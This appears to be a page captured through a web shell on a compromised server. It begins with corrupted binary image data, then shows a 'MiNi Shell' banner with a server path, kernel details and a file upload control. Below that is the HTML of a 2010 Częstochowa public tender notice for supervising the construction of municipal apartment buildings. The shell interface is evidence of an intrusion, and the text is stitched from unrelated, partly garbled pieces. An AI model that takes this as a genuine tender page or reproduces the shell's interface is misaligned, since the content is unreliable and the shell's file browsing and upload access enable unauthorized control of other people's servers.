JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100426/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100426/97237-N-2010.html

<p class="kh_header"><b>Częstochowa: Pełnienie nadzoru inwestorskiego dla zadania pn.: Budowa trzech budynków mieszkalnych komunalnych wielorodzinnych przy ulicy Bardowskiego w Częstochowie wraz z zagospodarowaniem terenu działki (dojazdy, parkingi, chodniki); przyłączami: wody, kanalizacji sanitarnej, kanalizacji  deszczowej,  centralnego ogrzewania oraz   przebudową istniejącego uzbrojenia elektroenergetycznego i telekomunikacyjnego.</b><br>
<b>Numer ogłoszenia: 97237 - 2010; data zamieszczenia: 26.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Częstochowa , ul. Śląska 11/13, 42-217 Częstochowa, woj. śląskie, tel. (034) 3707100, faks 034 3707175.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czestochowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego dla zadania pn.: Budowa trzech budynków mieszkalnych komunalnych wielorodzinnych przy ulicy Bardowskiego w Częstochowie wraz z zagospodarowaniem terenu działki (dojazdy, parkingi, chodniki); przyłączami: wody, kanalizacji sanitarnej, kanalizacji  deszczowej,  centralnego ogrzewania oraz   przebudową istniejącego uzbrojenia elektroenergetycznego i telekomunikacyjnego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie nadzoru inwestorskiego dla zadania pn.: Budowa trzech budynków mieszkalnych komunalnych wielorodzinnych przy ulicy Bardowskiego w Częstochowie wraz z zagospodarowaniem terenu działki (dojazdy, parkingi, chodniki); przyłączami: wody, kanalizacji sanitarnej, kanalizacji  deszczowej,  centralnego ogrzewania oraz   przebudową istniejącego uzbrojenia elektroenergetycznego i telekomunikacyjnego.

1. Lokalizacja: Budynki mieszkalne wielorodzinne komunalne
Częstochowa, ul. Bardowskiego
Działka nr: 1/52, k.m.  279.   

2. Obszar objęty zamówieniem zaznaczono na załącznikach:
a) nr 1 i 2 do SIWZ - ZAKRES I
b) nr 3 do SIWZ - ZAKRES II

3. Inspektorzy nadzoru posiadający uprawnienia określone przepisami Prawa budowlanego w nw. specjalnościach:
a) konstrukcyjno-budowlanej; 
b) instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;
c) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
d) drogowej,
e) telekomunikacyjnej.

4. Przedmiot zamówienia należy podzielić i wycenić z podziałem na dwa zakresy opisane poniżej.   

Zamawiający zastrzega sobie oprawo do niepodpisania umowy na cały przedmiot  zamówienia w przypadku, kiedy w sumie kwota na  I i II ZAKRES realizacji inwestycji przekroczy zarezerwowane środki budżetowe na ten cel. Zamawiający dopuszcza możliwość realizacji zadania w całości lub tylko I zakresu.

ZAKRES I - NADZÓR INWESTORSKI NAD:
a) Pracami rozbiórkowymi i wycinką drzew i krzewów.
W zakresie zamówienia przewiduje się rozbiórkę 5 budynków mieszkalnych, 4 budynków gospodarczych, elementy zagospodarowania terenu oraz wycinkę drzew i krzewów. 

b) Budową budynku mieszkalnego nr B i nr C wraz z zagospodarowaniem terenu przyległej do budynków B i C działki (dojazdy, parkingi i  chodniki); przyłączami: wody, kanalizacji sanitarnej, kanalizacji  deszczowej, centralnego ogrzewania oraz przebudową istniejącego uzbrojenia elektroenergetycznego i telekomunikacyjnego.

Budynek mieszkalny B - 
Dane charakterystyczne budynku:
- powierzchnia użytkowa netto - 2214,84 m2
- powierzchnia użytkowa mieszkań - 1572,98 m2
- powierzchnia zabudowy - 561,33 m2
- kubatura - 8158,90 m3
- liczba miejsc parkingowych - 90 + 3 dla niepełnosprawnych

Budynek mieszkalny C 
Dane charakterystyczne budynku:
- powierzchnia użytkowa netto - 2210,58 m2
- powierzchnia użytkowa mieszkań - 1552,84 m2
- powierzchnia zabudowy - 556,92 m2
- kubatura - 8094,83 m3

Przyłącza kanalizacji deszczowej:
- Zakres kanalizacji deszczowej czystej (odwodnienie dachów) w zakresie dotyczącym budynków B i C tzn. rury spustowe od R1 do R18 z odprowadzeniem do studzienek rewizyjnych oraz odcinki kanałów deszczowych pomiędzy studzienkami rewizyjnymi D1, D2, D3, D4, D5, D6, D7, D8, D9 wraz z  tymi studzienkami i odprowadzenie do kanalizacji deszczowej fi 250 mm przebiegającej w ulicy Bardowskiego. 
- Zakres kanalizacji deszczowej brudnej (odwodnienie terenu utwardzonego) do wykonania w całości łącznie z separatorem koalescencyjnym.

Przyłącza wody do bud. B i C
- Zakres obejmuje włączenie za pomocą nawiertki przyłącza wody z rur PE fi 90x8,2 mm do wodociągu ulicznego fi 150 mm przebiegającego w ulicy Bardowskiego oraz doprowadzenie do wodomierza głównego w budynku B w pomieszczeniu przeznaczonym na lokalizację zestawu pompowego podnoszenia ciśnienia (zestaw hydroforowy obejmuje projekt inst. wewnętrznej budynku B), a następnie doprowadzenie przewodem z rur PE fi 75x6,8 mm do rozgałęzienia w punkcie C oraz doprowadzenie przewodem z rur PE fi 63x5,8 mm do budynku C. 
- Przekładka wodociągu istniejącego fi 90 mm (dalej fi 50 mm) na wodociąg z rur PE fi 63x5,8 mm zasilający obiekty na działkach sąsiednich. 

Przyłącza kanalizacji sanitarnej:
- Zakres obejmuje odprowadzenie ścieków sanitarnych z budynków B i C  do kanalizacji sanitarnej fi 250 mm w ulicy Bardowskiego (odcinki kanalizacji sanitarnej pomiędzy studzienkami rewizyjnymi S1, S2, S3, S4, S5, S6 wraz z tymi studzienkami). Dla każdego z budynków przewidziano dwa wyprowadzenia kanalizacji sanitarnej. Przykanaliki do budynków ujęto w projektach instalacji wewnętrznych.

Przyłącza c.o. niskich parametrów  od węzła kompaktowego w bud. B do budynku C.
- Zakres obejmuje wykonanie przyłącza c.o. niskich parametrów z rur stalowych czarnych preizolowanych od węzła kompaktowego w bud. B do bud. C - średnica przyłącza Dn 50 mm (fi 60,3x2,9/125mm). 

Przebudowa istniejącego uzbrojenia elektroenergetycznego.
- Zakres obejmuje całe zadanie objęte opracowaniem projektowym: 
1. zabezpieczenie istniejących kabli energetycznych,
2. demontaż istniejących kabli energetycznych.

Przebudowa istniejącego uzbrojenia telekomunikacyjnego. 
Zakres obejmuje:
- demontaż istniejących urządzeń telekomunikacyjnych 
- wykonanie kanalizacji telekomunikacyjnej rurami PVC 110/3 (wraz z wykonaniem studzienek telekomunikacyjnych typu SK-1 przy każdej klatce schodowej) umożliwiające zainstalowanie przez Operatora przewodów dla podłączenia telekomunikacyjnego budynków B i C. Kanalizację wykonać wzdłuż dwóch budynków od strony wejść i podłączyć z istniejącą kanalizacją w studzience nr 3/1.
- zabezpieczenie istniejących urządzeń telekomunikacyjnych. 

Oświetlenie terenu
Zakres obejmuje:
- Instalację oświetlenia terenu, tablice oświetleniowe TOTB i TOTC oraz ochronę od porażeń dot. budynku B i C. Oświetlenie terenu przyporządkowane będzie do każdego budynku oddzielnie - poszczególne tablice oświetlenia terenu umieszczone będą odpowiednio w budynku B i C w tablicach administracyjnych znajdujących się na parterze w wiatrołapach.

Drogi dojazdowe i chodniki budynków B i C.
Zakres obejmuje:
- Wykonanie wewnętrznego układu komunikacyjnego oznaczonego A-A1-A2-A3-A4-A5, który będzie dojazdem podstawowym do parkingów i projektowanych budynków oraz dróg dojazdowych oznaczonych A1-B i A2-B1, stanowiących dojazdy do parkingów i zatok postojowych dla mieszkańców budynków B i C, a także parkingu oznaczonego A4-D2,
- Wykonanie chodników znajdujących się na terenie przyległym do budynków B i C, schodów terenowych, cieku betonowego korytkowego oraz placyku gospodarczego.

Zagospodarowanie terenu przy budynkach B i C.
Zakres obejmuje:
- wykonanie placyku gospodarczego ze śmietnikiem z cegły klinkierowej, z trzepakiem i ławką, całość otoczona zielenią maskującą (10 szt. pnącza) - jest to element zagospodarowania terenu, który znajduje się na terenie działki objętej zakresem II, lecz należy go wykonać w zakresie I.
- wykonanie nasadzeń drzew i krzewów oraz trawników w zakresie obejmującym teren działki przy budynkach B i C. (Przedłożyć plan nasadzeń do uzgodnienia do Wydziału Ochrony Środowiska, Rolnictwa i Leśnictwa).  
- ustawienie przy wejściach do budynków po 2 ławki z oparciem oraz wzdłuż chodnika dla pieszych 5 ławek - rekreacja dla osób starszych.

Elementy zagospodarowania terenu, które znajdują się na terenie działki objętej zakresem II, a które w celu zapewnienia bezpieczeństwa powinny być wykonane w zakresie I:
- wykonanie ogrodzenia od strony placu zabaw (sam plac zabaw będzie wykonywany w zakresie II) i torów kolejowych o wys. 2,20 m długości ok. 100,0 m
- wykonanie ekranu dźwiękoizolacyjnego -długości ok. 55 m
- wykonanie od strony torów kolejowych pasa zieleni izolacyjnej o szer. 5 m.

ZAKRES II - NADZÓR INWESTORSKI NAD:
Budową budynku mieszkalnego nr D wraz z zagospodarowaniem terenu przyległej do budynku D działki (dojazdy, parkingi i chodniki); przyłączami: wody, kanalizacji sanitarnej, kanalizacji deszczowej, centralnego ogrzewania oraz przebudową istniejącego uzbrojenia  telekomunikacyjnego.
 
Budynek mieszkalny D 
Dane charakterystyczne budynku:
- powierzchnia użytkowa netto - 2073,53 m2
- powierzchnia użytkowa mieszkań - 1447,78 m2
- powierzchnia zabudowy - 528,19 m2
- kubatura - 7677,23 m3

Przyłącza kanalizacji deszczowej:
- Zakres kanalizacji deszczowej czystej (odwodnienie dachów) w zakresie dotyczącym budynku D, tzn. rury spustowe od R19 do R25 z odprowadzeniem do   studzienek rewizyjnych oraz odcinki kanałów deszczowych pomiędzy studzienkami rewizyjnymi D9, D10, D11, D12 oraz D9, D13, D14 wraz z tymi studzienkami.

Przyłącze wody do bud. D
- Zakres obejmuje doprowadzenie wody od punktu C przewodem z rur PE fi 75x6,8 mm do budynku D. 

Przyłącza kanalizacji sanitarnej:
- Zakres obejmuje odprowadzenie ścieków sanitarnych z budynku D do studzienki S2 wykonanej w ramach zakresu II (odcinki kanalizacji sanitarnej pomiędzy studzienkami rewizyjnymi S9, S8, S7, S2 wraz ze studzienkami S9, S8, S7). Dla budynku przewidziano dwa wyprowadzenia kanalizacji sanitarnej. Przykanaliki do budynku ujęto w projekcie instalacji wewnętrznej.

Przyłącza c.o. niskich parametrów  od węzła kompaktowego w bud. B do budynku D.
- Zakres obejmuje wykonanie przyłącza c.o. niskich parametrów z rur stalowych czarnych preizolowanych od węzła kompaktowego w bud. B do bud. D - średnica przyłącza Dn 50 mm (fi 60,3x2,9/125mm).

Przebudowa istniejącego uzbrojenia telekomunikacyjnego. 
Zakres obejmuje:
- Wykonanie kanalizacji telekomunikacyjnej rurami PVC 110/3 (wraz z wykonaniem studzienek telekomunikacyjnych typu SK-1 przy każdej klatce schodowej) umożliwiające zainstalowanie przez Operatora przewodów dla podłączenia telekomunikacyjnego budynku D. Kanalizację wykonać wzdłuż  budynku od strony wejść.

Oświetlenie terenu
Zakres obejmuje:
- Instalację oświetlenia terenu, tablicę oświetleniową TOTD oraz ochronę od porażeń dot. budynku D. Oświetlenie terenu przyporządkowane będzie do budynku D - tablica oświetlenia terenu umieszczona będzie w budynku D w tablicy administracyjnej znajdującej się na parterze w wiatrołapie.

Drogi dojazdowe i chodniki budynku D.
- Zakres obejmuje wykonanie drogi dojazdowej oznaczonej A3-C, stanowiącej dojazd do parkingów i zatok postojowych dla mieszkańców budynku D, parkingu oznaczonego A4-D1, a także chodników znajdujących się na terenie przyległym do budynku D.

Zagospodarowanie terenu przy budynku D.
Zakres obejmuje:
- wykonanie placu zabaw z ławkami (10 szt.), zjeżdżalnią, huśtawkami (3 szt.), karuzelą i piaskownicą, całość otoczona drewniana palisadą,
- ustawienie przy wejściach do budynku po 2 ławki z oparciem, 
- wykonanie nasadzeń drzew i krzewów oraz trawników w zakresie obejmującym teren działki przy budynku D . (Przedłożyć plan nasadzeń do uzgodnienia do Wydziału Ochrony Środowiska, Rolnictwa i Leśnictwa).
 
5. Szczegółowy opis przedmiotu zamówienia zawierają:
a) dokumentacja projektowa składająca się z projektów budowlanych, spełniających funkcję projektów wykonawczych; 
b) przedmiary robót; 
c) specyfikacje techniczne wykonania i odbioru robót budowlanych w  części zawierającej zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące wymagania w zakresie właściwości materiałów, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót.

Wycena oferty winna być poprzedzona wizją lokalną i powinna uwzględniać wszystkie koszty i czynności niezbędne do wykonania przedmiotu zamówienia zgodnie z prawem i najlepszą wiedzą techniczną..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy udokumentują wykonanie, tj. zakończenie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednego zadania polegającego na pełnieniu nadzoru inwestorskiego, pełnieniu funkcji kierownika budowy lub kierownika robót nad wykonaniem roboty budowlanej, dotyczącej budowy lub przebudowy budynku mieszkalnego wielorodzinnego lub budynku użyteczności publicznej (zdefiniowanego w Rozporządzeniu Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie - Dz. U. Nr 75, poz. 690) o wartości robót min. 4.000.000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia, tj. posiadającymi uprawnienia określone przepisami Prawa budowlanego do pełnienia funkcji inspektorów nadzoru w niżej wymienionych specjalnościach: 
a) konstrukcyjno-budowlanej; 
b) instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;
c) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
d) drogowej,
e) telekomunikacyjnej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony Druk Oferta, stanowiący załącznik nr 5 do specyfikacji istotnych warunków zamówienia.
2. Aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli Wykonawca posiada taki wpis. 

W przypadku spółek cywilnych w ofercie należy złożyć zaświadczenie z Urzędu Skarbowego oraz z Zakładu Ubezpieczeń Społecznych zarówno na spółkę, jak i na każdego ze wspólników.

UWAGA 1: 
Zgodnie z art. 26 ust. 2b Prawa zamówień publicznych Wykonawca może polegać na wiedzy i doświadczeniu oraz osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany  jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, tj. przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 

 
UWAGA 2:
Wszystkie ww. dokumenty winny być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez osobę (-y) uprawnioną (-e) do składania oświadczeń woli w imieniu Wykonawcy.

Upoważnienie osób podpisujących ofertę do jej podpisania musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy (odpisu z właściwego rejestru lub zaświadczenia o wpisie do ewidencji działalności gospodarczej), to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie. 

Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.

UWAGA 3:
W przypadku składania oferty wspólnej przez kilku przedsiębiorców, każdy ze wspólników musi złożyć dokumenty wymienione w punkcie 6.1) SIWZ oraz w punkcie 6.4)b) SIWZ. W przypadku składania kopii tych dokumentów, kopie te winny być poświadczone za zgodność z oryginałem przez wspólników. Pozostałe dokumenty będą traktowane jako wspólne. Wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników.

Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
